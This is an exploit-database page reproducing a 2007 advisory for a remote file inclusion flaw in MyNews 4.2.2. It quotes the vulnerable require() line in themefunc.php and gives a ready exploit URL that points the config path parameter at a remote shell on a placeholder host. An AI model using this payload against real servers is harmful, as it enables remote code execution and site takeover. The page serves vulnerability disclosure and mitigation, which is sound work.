MyNews 4.2.2 - exploit.company

vendor:

MyNews

by:

GolD_M (Mahmnood_ali)

N/A

CVSS

HIGH

Remote File Include

CWE

Product Name: MyNews

Affected Version From: 4.2.2002

Affected Version To: 4.2.2002

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

MyNews 4.2.2 <= Remote File Include Vulnerability

This vulnerability allows an attacker to include a remote file in the MyNews application, potentially leading to remote code execution. The vulnerability is located in the themefunc.php file, specifically in line 2 where a file is required without proper validation.

Mitigation:

To mitigate this vulnerability, it is recommended to validate user input before including any files. Additionally, it is advised to keep the application up to date with the latest patches and security measures.

Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

MyNews 4.2.2 <=  Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Discovered by GolD_M(Mahmnood_ali)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

URL:
http://fresh.t-systems-sfr.com/unix/src/privat2/MyNews-4.2.2.tar.gz

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

V.CODE: In : /include/themes/themefunc.php  <<<<=====>>>>      Line : 2
require($myNewsConf['path']['sys']['index'] .  '/include/libs/modules.lib.php');

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit:
http://www.hedef.com/[mynews_path]/include/themes/themefunc.php?myNewsConf[path][sys][index]=http://sh3LL?

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Thanx : Tryag.Com & DwRaT.Com & Asb-May.Net & Milw0rm.com & H4cky0u.Com & Google.Com

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2007-01-30]